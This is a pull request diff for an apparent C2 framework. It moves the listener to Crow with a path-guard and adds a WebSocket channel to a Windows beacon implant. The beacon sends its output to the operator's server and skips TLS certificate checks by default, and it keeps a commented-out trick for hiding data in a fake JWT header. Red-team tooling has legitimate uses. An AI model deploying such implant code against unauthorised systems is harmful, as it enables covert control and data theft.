### PR TITLE
Refactor HTTP listener to Crow with WebSocket support

### DIFF
--- a/CMakeLists.txt
+++ b/CMakeLists.txt
@@ -187,6 +187,14 @@ FetchContent_Declare(
 )
 FetchContent_MakeAvailable(httplib)
 
+FetchContent_Declare(
+  crow
+  GIT_REPOSITORY https://github.com/CrowCpp/crow.git
+  GIT_TAG v1.1.1
+)
+FetchContent_MakeAvailable(crow)
+include_directories(${crow_SOURCE_DIR}/include)
+
 set(BUILD_SHARED_LIBS OFF CACHE BOOL "Build shared libraries" FORCE)
 set(BUILD_STATIC_LIBS ON CACHE BOOL "Build static libraries" FORCE)
 set(BUILD_EXAMPLES OFF CACHE BOOL "" FORCE)
@@ -204,6 +212,7 @@ FetchContent_MakeAvailable(libssh2)
 find_package(OpenSSL REQUIRED)
 add_library(openssl::openssl INTERFACE IMPORTED)
 target_link_libraries(openssl::openssl INTERFACE OpenSSL::SSL OpenSSL::Crypto)
+add_compile_definitions(CROW_ENABLE_SSL)
 
 # Build tests only when explicitly enabled. Default to ON when C2Core is the
 # top-level project and OFF when included from another build.

--- a/beacon/BeaconHttp.cpp
+++ b/beacon/BeaconHttp.cpp
@@ -9,7 +9,10 @@
 
 #elif _WIN32
 
-#include <WinHttp.h>
+#include <bcrypt.h>
+#include <wincrypt.h>
+#pragma comment(lib, "bcrypt.lib")
+#pragma comment(lib, "crypt32.lib")
 #pragma comment(lib, "winhttp.lib")
 
 #endif
@@ -175,139 +178,513 @@ string HttpsWebRequestPost(const string& domain, int port, const string& url, co
 }
 
 
-// send data in a fake jwt
-string HttpsWebRequestGet(const string& domain, int port, const string& url, const string& data, const nlohmann::json& httpHeaders, bool isHttps)
-{
-    wstring sdomain = getUtf16(domain, CP_UTF8);
-    wstring surl = getUtf16(url, CP_UTF8);
+// // send data in a fake jwt
+// string HttpsWebRequestGet(const string& domain, int port, const string& url, const string& data, const nlohmann::json& httpHeaders, bool isHttps)
+// {
+//     wstring sdomain = getUtf16(domain, CP_UTF8);
+//     wstring surl = getUtf16(url, CP_UTF8);
 
-    DWORD dwSize = 0;
+//     DWORD dwSize = 0;
     
-    LPSTR pszOutBuffer;
-    BOOL  bResults = FALSE;
-    HINTERNET  hSession = NULL, hConnect = NULL, hRequest = NULL;
+//     LPSTR pszOutBuffer;
+//     BOOL  bResults = FALSE;
+//     HINTERNET  hSession = NULL, hConnect = NULL, hRequest = NULL;
 
-    // Use WinHttpOpen to obtain a session handle.
-    hSession = WinHttpOpen(L"WinHTTP Example/1.0", WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);
+//     // Use WinHttpOpen to obtain a session handle.
+//     hSession = WinHttpOpen(L"WinHTTP Example/1.0", WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);
 
-    // Specify an HTTP server.
-    if (hSession)
-        hConnect = WinHttpConnect(hSession, sdomain.c_str(), port, 0);
+//     // Specify an HTTP server.
+//     if (hSession)
+//         hConnect = WinHttpConnect(hSession, sdomain.c_str(), port, 0);
 
-    // Create an HTTP request handle.
-    DWORD dwFlags = 0;
-    if(isHttps)
-        dwFlags = WINHTTP_FLAG_REFRESH | WINHTTP_FLAG_SECURE;
+//     // Create an HTTP request handle.
+//     DWORD dwFlags = 0;
+//     if(isHttps)
+//         dwFlags = WINHTTP_FLAG_REFRESH | WINHTTP_FLAG_SECURE;
 
-    if (hConnect)
-        hRequest = WinHttpOpenRequest(hConnect, L"GET", surl.c_str(), NULL, WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, dwFlags);
+//     if (hConnect)
+//         hRequest = WinHttpOpenRequest(hConnect, L"GET", surl.c_str(), NULL, WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, dwFlags);
 
-    // Add a request header.
-    if( hRequest )
+//     // Add a request header.
+//     if( hRequest )
+//     {
+//         for (auto& it : httpHeaders.items())
+//         {
+//             std::string newHeader = (it).key();
+//             newHeader+=":";
+//             newHeader+=(it).value();
+
+//             std::wstring stemp = std::wstring(newHeader.begin(), newHeader.end());
+
+//             bResults = WinHttpAddRequestHeaders( hRequest, stemp.c_str(), (ULONG)-1L, WINHTTP_ADDREQ_FLAG_ADD );
+//         }
+//     }
+
+//     std::string dataHeader = "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkb21haW4iOiJkZWNhdW1pYWJhaWxsZW54LmNvbSIsImlkIjoiMTUxNjIzOTAyMiIsInVzZXIiOiJnZXN0In0.";
+//     dataHeader+=data;
+//     std::wstring stemp = std::wstring(dataHeader.begin(), dataHeader.end());
+//     bResults = WinHttpAddRequestHeaders( hRequest, stemp.c_str(), (ULONG)-1L, WINHTTP_ADDREQ_FLAG_ADD );
+
+//     if(isHttps)
+//     {
+//         // if https & self sign certificat
+//         dwFlags =
+//             SECURITY_FLAG_IGNORE_UNKNOWN_CA |
+//             SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE |
+//             SECURITY_FLAG_IGNORE_CERT_CN_INVALID |
+//             SECURITY_FLAG_IGNORE_CERT_DATE_INVALID;
+
+//         WinHttpSetOption(hRequest, WINHTTP_OPTION_SECURITY_FLAGS, &dwFlags, sizeof(dwFlags));
+//     }
+
+//     // Send a request.
+//     if (hRequest)
+//         bResults = WinHttpSendRequest(hRequest, WINHTTP_NO_ADDITIONAL_HEADERS, 0, WINHTTP_NO_REQUEST_DATA, 0, 0, 0);
+
+//     // if (!bResults)
+//     //     printf("Error %d has occurred.\n", GetLastError());
+
+//     // End the request.
+//     if (bResults)
+//         bResults = WinHttpReceiveResponse(hRequest, NULL);
+
+//     DWORD dwStatusCode = 0;
+//     dwSize = sizeof(dwStatusCode);
+
+//     WinHttpQueryHeaders(hRequest, WINHTTP_QUERY_STATUS_CODE | WINHTTP_QUERY_FLAG_NUMBER, WINHTTP_HEADER_NAME_BY_INDEX, &dwStatusCode, &dwSize, WINHTTP_NO_HEADER_INDEX);
+
+
+//     // Keep checking for data until there is nothing left.
+//     string response;
+//     if (bResults)
+//     {
+//         do
+//         {
+//             // Check for available data.
+//             dwSize = 0;
+//             if (!WinHttpQueryDataAvailable(hRequest, &dwSize))
+//             {
+//                 // printf("Error %u in WinHttpQueryDataAvailable.\n", GetLastError());
+//             }
+
+//             // Allocate space for the buffer.
+//             pszOutBuffer = new char[dwSize + 1];
+//             if (!pszOutBuffer)
+//             {
+//                 // printf("Out of memory\n");
+//                 dwSize = 0;
+//             }
+//             else
+//             {
+//                 // Read the data.
+//                 ZeroMemory(pszOutBuffer, dwSize + 1);
+
+//                 DWORD dwDownloaded = 0;
+//                 if (!WinHttpReadData(hRequest, (LPVOID)pszOutBuffer, dwSize, &dwDownloaded))
+//                 {
+//                     // printf("Error %u in WinHttpReadData.\n", GetLastError());
+//                 }
+//                 else
+//                 {
+//                     // printf("%s", pszOutBuffer);
+//                     response = response + string(pszOutBuffer);
+//                 }
+
+//                 // Free the memory allocated to the buffer.
+//                 delete[] pszOutBuffer;
+//             }
+//         } while (dwSize > 0);
+//     }
+
+//     // Report any errors.
+//     // if (!bResults)
+//     //     printf("Error %d has occurred.\n", GetLastError());
+
+//     // Close any open handles.
+//     if (hRequest) 
+//         WinHttpCloseHandle(hRequest);
+//     if (hConnect) 
+//         WinHttpCloseHandle(hConnect);
+//     if (hSession) 
+//         WinHttpCloseHandle(hSession);
+
+//     return response;
+// }
+
+
+std::string GenerateSecWebSocketKey()
+{
+    BYTE rnd[16];
+    BCryptGenRandom(NULL, rnd, sizeof(rnd), BCRYPT_USE_SYSTEM_PREFERRED_RNG);
+
+    // base64 encode
+    DWORD size = 0;
+    CryptBinaryToStringA(rnd, sizeof(rnd), CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, NULL, &size);
+    std::string key(size, 0);
+    CryptBinaryToStringA(rnd, sizeof(rnd), CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, key.data(), &size);
+
+    return key;
+}
+
+
+void LogLastError(const char* msg)
+{
+    DWORD err = GetLastError();
+    //std::cout << msg << " FAILED. LastError = " << err << std::endl;
+}
+
+
+// Returns true if a complete message was received into replyText/replyBin.
+// isBinary tells you which one is valid.
+bool ReceiveFullWsMessage(
+    HINTERNET hWebSocket,
+    std::string& replyText,
+    std::vector<BYTE>& replyBin,
+    bool& isBinary
+)
+{
+    replyText.clear();
+    replyBin.clear();
+    isBinary = false;
+
+    std::vector<BYTE> buffer(4096);
+
+    DWORD bytesRead = 0;
+    WINHTTP_WEB_SOCKET_BUFFER_TYPE type = WINHTTP_WEB_SOCKET_BINARY_MESSAGE_BUFFER_TYPE;
+
+    bool started = false;
+    bool binary = false;
+
+    for (;;)
     {
-        for (auto& it : httpHeaders.items())
+        bytesRead = 0;
+        type = WINHTTP_WEB_SOCKET_BINARY_MESSAGE_BUFFER_TYPE;
+
+        DWORD recvRes = WinHttpWebSocketReceive(
+            hWebSocket,
+            buffer.data(),
+            static_cast<DWORD>(buffer.size()),
+            &bytesRead,
+            &type
+        );
+
+        if (recvRes != NO_ERROR)
         {
-            std::string newHeader = (it).key();
-            newHeader+=":";
-            newHeader+=(it).value();
-
-            std::wstring stemp = std::wstring(newHeader.begin(), newHeader.end());
-
-            bResults = WinHttpAddRequestHeaders( hRequest, stemp.c_str(), (ULONG)-1L, WINHTTP_ADDREQ_FLAG_ADD );
+            //std::cout << "[WS] Receive error = " << recvRes << std::endl;
+            return false;
         }
+
+        // Handle CLOSE
+        if (type == WINHTTP_WEB_SOCKET_CLOSE_BUFFER_TYPE)
+        {
+            USHORT status = 0;
+            std::vector<BYTE> reason(256);
+            DWORD reasonLen = 0;
+
+            DWORD st = WinHttpWebSocketQueryCloseStatus(
+                hWebSocket,
+                &status,
+                reason.data(),
+                static_cast<DWORD>(reason.size()),
+                &reasonLen
+            );
+
+            std::string reasonStr;
+            if (st == NO_ERROR && reasonLen > 0)
+                reasonStr.assign(reinterpret_cast<char*>(reason.data()), reasonLen);
+
+            //std::cout << "[WS] Close received. status=" << status
+                    //   << " reason=" << reasonStr << std::endl;
+            return false;
+        }
+
+        // Determine message kind on the first frame
+        if (!started)
+        {
+            started = true;
+            if (type == WINHTTP_WEB_SOCKET_UTF8_MESSAGE_BUFFER_TYPE ||
+                type == WINHTTP_WEB_SOCKET_UTF8_FRAGMENT_BUFFER_TYPE)
+            {
+                binary = false;
+            }
+            else if (type == WINHTTP_WEB_SOCKET_BINARY_MESSAGE_BUFFER_TYPE ||
+                     type == WINHTTP_WEB_SOCKET_BINARY_FRAGMENT_BUFFER_TYPE)
+            {
+                binary = true;
+            }
+            else
+            {
+                //std::cout << "[WS] Unexpected buffer type: " << type << std::endl;
+                return false;
+            }
+        }
+
+        // Accumulate payload (bytesRead may be 0 on some frames)
+        if (bytesRead > 0)
+        {
+            if (binary)
+                replyBin.insert(replyBin.end(), buffer.begin(), buffer.begin() + bytesRead);
+            else
+                replyText.append(reinterpret_cast<const char*>(buffer.data()), bytesRead);
+        }
+
+        // Done when we get a *MESSAGE* buffer type (not FRAGMENT)
+        if (!binary && type == WINHTTP_WEB_SOCKET_UTF8_MESSAGE_BUFFER_TYPE)
+            break;
+        if (binary && type == WINHTTP_WEB_SOCKET_BINARY_MESSAGE_BUFFER_TYPE)
+            break;
+
+        // Otherwise we received a fragment; continue reading
     }
 
-    std::string dataHeader = "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkb21haW4iOiJkZWNhdW1pYWJhaWxsZW54LmNvbSIsImlkIjoiMTUxNjIzOTAyMiIsInVzZXIiOiJnZXN0In0.";
-    dataHeader+=data;
-    std::wstring stemp = std::wstring(dataHeader.begin(), dataHeader.end());
-    bResults = WinHttpAddRequestHeaders( hRequest, stemp.c_str(), (ULONG)-1L, WINHTTP_ADDREQ_FLAG_ADD );
+    isBinary = binary;
+    return true;
+}
 
-    if(isHttps)
+
+static void WsDisconnect(WsClient& c)
+{
+    if (c.hWebSocket)
     {
-        // if https & self sign certificat
-        dwFlags =
+        // Best-effort close; ignore failures here.
+        WinHttpWebSocketClose(c.hWebSocket,
+                              WINHTTP_WEB_SOCKET_SUCCESS_CLOSE_STATUS,
+                              NULL, 0);
+        WinHttpCloseHandle(c.hWebSocket);
+        c.hWebSocket = nullptr;
+    }
+
+    if (c.hConnect)
+    {
+        WinHttpCloseHandle(c.hConnect);
+        c.hConnect = nullptr;
+    }
+
+    if (c.hSession)
+    {
+        WinHttpCloseHandle(c.hSession);
+        c.hSession = nullptr;
+    }
+}
+
+
+static bool WsConnectOnce(WsClient& c)
+{
+    WsDisconnect(c); // ensure clean state before connecting
+
+    //std::cout << "[WS] Host=" << std::string(c.host.begin(), c.host.end())
+            //   << " Path=" << std::string(c.path.begin(), c.path.end())
+            //   << " Port=" << c.port
+            //   << " HTTPS=" << c.isHttps
+            //   << std::endl;
+
+    const DWORD requestFlags = c.isHttps ? WINHTTP_FLAG_SECURE : 0;
+
+    // SESSION
+    c.hSession = WinHttpOpen(L"Beacon/1.0",
+                             WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
+                             WINHTTP_NO_PROXY_NAME,
+                             WINHTTP_NO_PROXY_BYPASS,
+                             0);
+    if (!c.hSession)
+    {
+        LogLastError("[WS] WinHttpOpen");
+        WsDisconnect(c);
+        return false;
+    }
+
+    // CONNECT
+    //std::cout << "[WS] WinHttpConnect...\n";
+    c.hConnect = WinHttpConnect(c.hSession, c.host.c_str(), (INTERNET_PORT)c.port, 0);
+    if (!c.hConnect)
+    {
+        LogLastError("[WS] WinHttpConnect");
+        WsDisconnect(c);
+        return false;
+    }
+
+    // REQUEST (temporary handle; closed after upgrade)
+    //std::cout << "[WS] WinHttpOpenRequest to "
+            //   << std::string(c.path.begin(), c.path.end()) << "\n";
+
+    HINTERNET hRequest = WinHttpOpenRequest(
+        c.hConnect,
+        L"GET",
+        c.path.c_str(),
+        NULL,
+        WINHTTP_NO_REFERER,
+        WINHTTP_DEFAULT_ACCEPT_TYPES,
+        requestFlags
+    );
+
+    if (!hRequest)
+    {
+        LogLastError("[WS] WinHttpOpenRequest");
+        WsDisconnect(c);
+        return false;
+    }
+
+    // WebSocket upgrade option
+    //std::cout << "[WS] Setting WINHTTP_OPTION_UPGRADE_TO_WEB_SOCKET...\n";
+    if (!WinHttpSetOption(hRequest, WINHTTP_OPTION_UPGRADE_TO_WEB_SOCKET, NULL, 0))
+    {
+        LogLastError("[WS] WinHttpSetOption(UPGRADE)");
+        WinHttpCloseHandle(hRequest);
+        WsDisconnect(c);
+        return false;
+    }
+
+    // Headers
+    //std::cout << "[WS] Adding WebSocket headers...\n";
+    std::wstring headers =
+        L"Connection: Upgrade\r\n"
+        L"Upgrade: websocket\r\n"
+        L"Sec-WebSocket-Version: 13\r\n"
+        L"Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\r\n"; // NOTE: static key only for debugging
+
+    if (!WinHttpAddRequestHeaders(hRequest, headers.c_str(), -1, WINHTTP_ADDREQ_FLAG_ADD))
+    {
+        LogLastError("[WS] WinHttpAddRequestHeaders");
+        WinHttpCloseHandle(hRequest);
+        WsDisconnect(c);
+        return false;
+    }
+
+    // TLS relax (optional)
+    if (c.isHttps && c.allowInsecureTls)
+    {
+        DWORD secFlags =
             SECURITY_FLAG_IGNORE_UNKNOWN_CA |
             SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE |
             SECURITY_FLAG_IGNORE_CERT_CN_INVALID |
             SECURITY_FLAG_IGNORE_CERT_DATE_INVALID;
 
-        WinHttpSetOption(hRequest, WINHTTP_OPTION_SECURITY_FLAGS, &dwFlags, sizeof(dwFlags));
+        WinHttpSetOption(hRequest, WINHTTP_OPTION_SECURITY_FLAGS, &secFlags, sizeof(secFlags));
     }
 
-    // Send a request.
-    if (hRequest)
-        bResults = WinHttpSendRequest(hRequest, WINHTTP_NO_ADDITIONAL_HEADERS, 0, WINHTTP_NO_REQUEST_DATA, 0, 0, 0);
-
-    // if (!bResults)
-    //     printf("Error %d has occurred.\n", GetLastError());
-
-    // End the request.
-    if (bResults)
-        bResults = WinHttpReceiveResponse(hRequest, NULL);
-
-    DWORD dwStatusCode = 0;
-    dwSize = sizeof(dwStatusCode);
-
-    WinHttpQueryHeaders(hRequest, WINHTTP_QUERY_STATUS_CODE | WINHTTP_QUERY_FLAG_NUMBER, WINHTTP_HEADER_NAME_BY_INDEX, &dwStatusCode, &dwSize, WINHTTP_NO_HEADER_INDEX);
-
-
-    // Keep checking for data until there is nothing left.
-    string response;
-    if (bResults)
+    // SEND REQUEST
+    //std::cout << "[WS] Sending request...\n";
+    if (!WinHttpSendRequest(hRequest, NULL, 0, NULL, 0, 0, NULL))
     {
-        do
-        {
-            // Check for available data.
-            dwSize = 0;
-            if (!WinHttpQueryDataAvailable(hRequest, &dwSize))
-            {
-                // printf("Error %u in WinHttpQueryDataAvailable.\n", GetLastError());
-            }
-
-            // Allocate space for the buffer.
-            pszOutBuffer = new char[dwSize + 1];
-            if (!pszOutBuffer)
-            {
-                // printf("Out of memory\n");
-                dwSize = 0;
-            }
-            else
-            {
-                // Read the data.
-                ZeroMemory(pszOutBuffer, dwSize + 1);
-
-                DWORD dwDownloaded = 0;
-                if (!WinHttpReadData(hRequest, (LPVOID)pszOutBuffer, dwSize, &dwDownloaded))
-                {
-                    // printf("Error %u in WinHttpReadData.\n", GetLastError());
-                }
-                else
-                {
-                    // printf("%s", pszOutBuffer);
-                    response = response + string(pszOutBuffer);
-                }
-
-                // Free the memory allocated to the buffer.
-                delete[] pszOutBuffer;
-            }
-        } while (dwSize > 0);
+        LogLastError("[WS] WinHttpSendRequest");
+        WinHttpCloseHandle(hRequest);
+        WsDisconnect(c);
+        return false;
     }
 
-    // Report any errors.
-    // if (!bResults)
-    //     printf("Error %d has occurred.\n", GetLastError());
-
-    // Close any open handles.
-    if (hRequest) 
+    // RECEIVE RESPONSE
+    //std::cout << "[WS] Receiving response...\n";
+    if (!WinHttpReceiveResponse(hRequest, NULL))
+    {
+        LogLastError("[WS] WinHttpReceiveResponse");
         WinHttpCloseHandle(hRequest);
-    if (hConnect) 
-        WinHttpCloseHandle(hConnect);
-    if (hSession) 
-        WinHttpCloseHandle(hSession);
+        WsDisconnect(c);
+        return false;
+    }
 
-    return response;
+    // CHECK STATUS CODE
+    DWORD status = 0;
+    DWORD size   = sizeof(status);
+    WinHttpQueryHeaders(hRequest,
+                        WINHTTP_QUERY_STATUS_CODE | WINHTTP_QUERY_FLAG_NUMBER,
+                        WINHTTP_HEADER_NAME_BY_INDEX,
+                        &status, &size, WINHTTP_NO_HEADER_INDEX);
+
+    //std::cout << "[WS] HTTP Status = " << status << "\n";
+    if (status != 101)
+    {
+        //std::cout << "[WS] ERROR: Expected 101 Switching Protocols\n";
+        WinHttpCloseHandle(hRequest);
+        WsDisconnect(c);
+        return false;
+    }
+
+    // COMPLETE UPGRADE
+    //std::cout << "[WS] Completing WebSocket upgrade...\n";
+    c.hWebSocket = WinHttpWebSocketCompleteUpgrade(hRequest, NULL);
+    WinHttpCloseHandle(hRequest); // safe after upgrade
+
+    if (!c.hWebSocket)
+    {
+        LogLastError("[WS] WinHttpWebSocketCompleteUpgrade");
+        WsDisconnect(c);
+        return false;
+    }
+
+    //std::cout << "[WS] Upgrade OK (hWebSocket=" << c.hWebSocket << ")\n";
+    return true;
 }
 
+
+static bool WsConnectWithRetry(WsClient& c, int maxAttempts = 5, int baseDelayMs = 250)
+{
+    for (int attempt = 1; attempt <= maxAttempts; ++attempt)
+    {
+        if (WsConnectOnce(c))
+            return true;
+
+        if (attempt == maxAttempts)
+            break;
+
+        // simple exponential backoff (cap it)
+        int delay = baseDelayMs * (1 << (attempt - 1));
+        if (delay > 5000) delay = 5000;
+
+        //std::cout << "[WS] Connect failed; retry " << (attempt + 1)
+                //   << "/" << maxAttempts << " in " << delay << "ms\n";
+        Sleep((DWORD)delay);
+    }
+
+    return false;
+}
+
+
+static bool WsCommunicate(WsClient& c,
+                          const std::string& message,
+                          std::string& replyText,
+                          std::vector<BYTE>* replyBinOut = nullptr,
+                          bool* isBinaryOut = nullptr)
+{
+    if (!c.hWebSocket)
+    {
+        //std::cout << "[WS] ERROR: communicate called with no active websocket\n";
+        return false;
+    }
+
+    // SEND MESSAGE
+    //std::cout << "[WS] Sending WS message: " << message << "\n";
+    if (WinHttpWebSocketSend(c.hWebSocket,
+                             WINHTTP_WEB_SOCKET_UTF8_MESSAGE_BUFFER_TYPE,
+                             (BYTE*)message.data(),
+                             (DWORD)message.size()) != 0)
+    {
+        LogLastError("[WS] WinHttpWebSocketSend");
+        return false;
+    }
+
+    // RECEIVE FULL MESSAGE (your helper)
+    std::vector<BYTE> replyBin;
+    bool isBinary = false;
+
+    if (!ReceiveFullWsMessage(c.hWebSocket, replyText, replyBin, isBinary))
+        return false;
+
+    // if (isBinary)
+    //     //std::cout << "[WS] Got binary message, size=" << replyBin.size() << "\n";
+    // else
+    //     //std::cout << "[WS] Got text message, size=" << replyText.size() << "\n";
+
+    if (replyBinOut)  *replyBinOut  = std::move(replyBin);
+    if (isBinaryOut)  *isBinaryOut  = isBinary;
+
+    return true;
+}
+
+
+std::wstring stringToWstring(const std::string& s)
+{
+    return std::wstring(s.begin(), s.end());
+}
 
 #endif
 
@@ -333,6 +710,9 @@ BeaconHttp::BeaconHttp(std::string& config, std::string& ip, int port, bool isHt
     
     for(int i=0; i<config.size(); i++)
         config[i]='.';
+
+    m_upgradeToWs = true;
+    m_isWsConnected = false;
 }
 
 
@@ -427,16 +807,37 @@ void BeaconHttp::checkIn()
     if(!m_isHttps)
         httpHeaders = m_beaconHttpConfig["client"]["headers"];
     else 
-        httpHeaders = m_beaconHttpConfig["client"]["headers"];
+        httpHeaders = m_beaconHttpConfig["client"]["headers"];    
 
-    // TODO put a rule to know when do post and when we do get
-    bool isPost=true;
+    if (m_upgradeToWs && !m_isWsConnected)
+    {
+        endPoint = "/ws";
+
+        wstring sdomain = getUtf16(m_ip, CP_UTF8);
+        wstring surl = getUtf16(endPoint, CP_UTF8);
+
+        
+        m_ws.host   = sdomain;
+        m_ws.port   = m_port;
+        m_ws.path   = surl;
+        m_ws.isHttps = m_isHttps;
+        m_ws.allowInsecureTls = true; // mirrors curl -k; set false if you trust/pin certs
+
+        if (WsConnectWithRetry(m_ws, /*maxAttempts*/5, /*baseDelayMs*/250))
+            m_isWsConnected = true;
+        
+        m_upgradeToWs = false;        
+    }
 
     std::string input;
-    if(isPost)
-        input = HttpsWebRequestPost(m_ip, m_port, endPoint, output, httpHeaders, m_isHttps);
+    if(m_isWsConnected)
+    {
+        WsCommunicate(m_ws, output, input);
+                // m_isWsConnected = false;
+    }
     else
-        input = HttpsWebRequestGet(m_ip, m_port, endPoint, output, httpHeaders, m_isHttps);
+        input = HttpsWebRequestPost(m_ip, m_port, endPoint, output, httpHeaders, m_isHttps);
+
 
     if (!input.empty())
     {

--- a/beacon/BeaconHttp.hpp
+++ b/beacon/BeaconHttp.hpp
@@ -3,6 +3,31 @@
 #include "Beacon.hpp"
 
 
+#ifdef _WIN32
+
+#include <windows.h>
+#include <WinHttp.h>
+
+struct WsClient
+{
+    // config
+    std::wstring host;
+    int          port     = 0;
+    std::wstring path;
+    bool         isHttps  = false;
+
+    // handles
+    HINTERNET hSession   = nullptr;
+    HINTERNET hConnect   = nullptr;
+    HINTERNET hWebSocket = nullptr;
+
+    // optional: accept self-signed (mirrors your current -k behavior)
+    bool allowInsecureTls = true;
+};
+
+#endif
+
+
 class BeaconHttp : public Beacon
 {
 
@@ -18,5 +43,9 @@ private:
 
     nlohmann::json m_beaconHttpConfig;
     bool m_isHttps;
+    
+    WsClient m_ws;
+    bool m_upgradeToWs;
+    bool m_isWsConnected;
 
 };

--- a/listener/Listener.hpp
+++ b/listener/Listener.hpp
@@ -22,7 +22,7 @@ class Listener
 
 public:
     Listener(const std::string& param1, const std::string& param2, const std::string& type);
-    virtual ~Listener(){};
+    virtual ~Listener() = default;
 
         const std::string & getParam1() const;
         const std::string & getParam2() const;

--- a/listener/ListenerHttp.cpp
+++ b/listener/ListenerHttp.cpp
@@ -1,27 +1,75 @@
 #include "ListenerHttp.hpp"
+
+#include <fstream>
+#include <iomanip>
+#include <sstream>
+#include <cstdio>
+
 #include <openssl/md5.h>
 
 using namespace std;
-using namespace httplib;
 using json = nlohmann::json;
 
-
-static std::string computeBufferMd5(const std::string& buffer)
+namespace
 {
-    if (buffer.empty()) return "";
+std::string computeBufferMd5(const std::string& buffer)
+{
+        if (buffer.empty()) return "";
 
-    unsigned char result[MD5_DIGEST_LENGTH];
-    MD5_CTX ctx;
-    MD5_Init(&ctx);
-    MD5_Update(&ctx, buffer.data(), buffer.size());
-    MD5_Final(result, &ctx);
+        unsigned char result[MD5_DIGEST_LENGTH];
+        MD5_CTX ctx;
+        MD5_Init(&ctx);
+        MD5_Update(&ctx, buffer.data(), buffer.size());
+        MD5_Final(result, &ctx);
 
-    std::ostringstream oss;
-    for (int i = 0; i < MD5_DIGEST_LENGTH; ++i)
-        oss << std::hex << std::setw(2) << std::setfill('0') << (int)result[i];
+        std::ostringstream oss;
+        for (int i = 0; i < MD5_DIGEST_LENGTH; ++i)
+                oss << std::hex << std::setw(2) << std::setfill('0') << (int)result[i];
 
-    return oss.str();
+        return oss.str();
 }
+} // namespace
+
+
+void ListenerHttp::PathGuardMiddleware::before_handle(crow::request& req, crow::response& res, context&)
+{
+        if (!m_config)
+                return;
+
+        const std::string& path = req.url;
+        bool isUri = false;
+
+        for (const auto& value : m_config->uris)
+        {
+                if (path == value)
+                {
+                        isUri = true;
+                        break;
+                }
+        }
+
+        if (!isUri && !m_config->downloadPrefix.empty() && path.find(m_config->downloadPrefix) != std::string::npos)
+                isUri = true;
+
+        if (!isUri)
+        {
+                for (const auto& wsUri : m_config->wsUris)
+                {
+                        if (path == wsUri)
+                        {
+                                isUri = true;
+                                break;
+                        }
+                }
+        }
+
+        if (!isUri)
+        {
+                res.code = 401;
+                res.end();
+        }
+}
+
 
 ListenerHttp::ListenerHttp(const std::string& ip, int localPort, const nlohmann::json& config, bool isHttps)
         : Listener(ip, std::to_string(localPort), (isHttps==true) ? ListenerHttpsType : ListenerHttpType)
@@ -68,6 +116,10 @@ ListenerHttp::ListenerHttp(const std::string& ip, int localPort, const nlohmann:
         m_logger->set_level(logLevel);
         m_logger->info("Initializing {} listener on {}:{}", type, m_host, m_port);
 #endif
+
+        // Configure middleware guard
+        auto guardConfig = std::make_shared<PathGuardConfig>();
+        m_app.get_middleware<PathGuardMiddleware>().setConfig(guardConfig);
 }
 
 
@@ -75,22 +127,7 @@ int ListenerHttp::init()
 {
         try
         {
-                if(m_isHttps)
-                {
-                        std::string servCrtFile = m_listenerConfig.value("ServHttpsListenerCrtFile", std::string{});
-                        std::string servKeyFile = m_listenerConfig.value("ServHttpsListenerKeyFile", std::string{});
-                        if(servCrtFile.empty() || servKeyFile.empty())
-                        {
-#ifdef BUILD_TEAMSERVER
-                                if(m_logger)
-                                        m_logger->error("Missing HTTPS certificate configuration for listener on {}:{}", m_host, m_port);
-#endif
-                                return -1;
-                        }
-                        m_svr = std::make_unique<httplib::SSLServer>(servCrtFile.c_str(), servKeyFile.c_str());
-                }
-                else
-                        m_svr = std::make_unique<httplib::Server>();
+                m_httpServ = std::make_unique<std::thread>(&ListenerHttp::launchHttpServ, this);
         }
         catch (const std::exception& ex)
         {
@@ -100,8 +137,6 @@ int ListenerHttp::init()
 #endif
                 return -1;
         }
-
-        this->m_httpServ = std::make_unique<std::thread>(&ListenerHttp::launchHttpServ, this);
 
 #ifdef BUILD_TEAMSERVER
         if(m_logger)
@@ -113,8 +148,10 @@ int ListenerHttp::init()
 
 ListenerHttp::~ListenerHttp()
 {
-        if(m_svr)
-                m_svr->stop();
+        m_stopRequested = true;
+        stopWebSocketMaintenance();
+        m_app.stop();
+
         if(m_httpServ && m_httpServ->joinable())
                 m_httpServ->join();
 
@@ -127,11 +164,10 @@ ListenerHttp::~ListenerHttp()
 
 void ListenerHttp::launchHttpServ()
 {
-    httplib::Response res;
-
         json uri = json::array();
         std::string uriFileDownload = m_listenerConfig.value("uriFileDownload", std::string{});
         std::string downloadFolder = m_listenerConfig.value("downloadFolder", std::string{});
+        std::vector<std::string> wsUris;
 
         auto itUri = m_listenerConfig.find("uri");
         if(itUri == m_listenerConfig.end() || !itUri->is_array())
@@ -144,6 +180,31 @@ void ListenerHttp::launchHttpServ()
         }
         uri = *itUri;
 
+        if (auto itWs = m_listenerConfig.find("wsUri"); itWs != m_listenerConfig.end() && itWs->is_array())
+        {
+                for (const auto& value : *itWs)
+                {
+                        if (value.is_string())
+                                wsUris.emplace_back(value.get<std::string>());
+                }
+        }
+
+        m_wsMaxMessageSize = m_listenerConfig.value("wsMaxMessageSize", static_cast<uint64_t>(1024 * 1024));
+        auto wsIdleTimeoutSec = m_listenerConfig.value("wsIdleTimeoutSec", 0);
+        if (wsIdleTimeoutSec > 0)
+                m_wsIdleTimeout = std::chrono::seconds(wsIdleTimeoutSec);
+
+        auto guardConfig = std::make_shared<PathGuardConfig>();
+        guardConfig->uris.clear();
+        for (const auto& value : uri)
+        {
+                if (value.is_string())
+                        guardConfig->uris.emplace_back(value.get<std::string>());
+        }
+        guardConfig->wsUris = wsUris;
+        guardConfig->downloadPrefix = uriFileDownload;
+        m_app.get_middleware<PathGuardMiddleware>().setConfig(guardConfig);
+
 #ifdef BUILD_TEAMSERVER
         if(m_logger)
         {
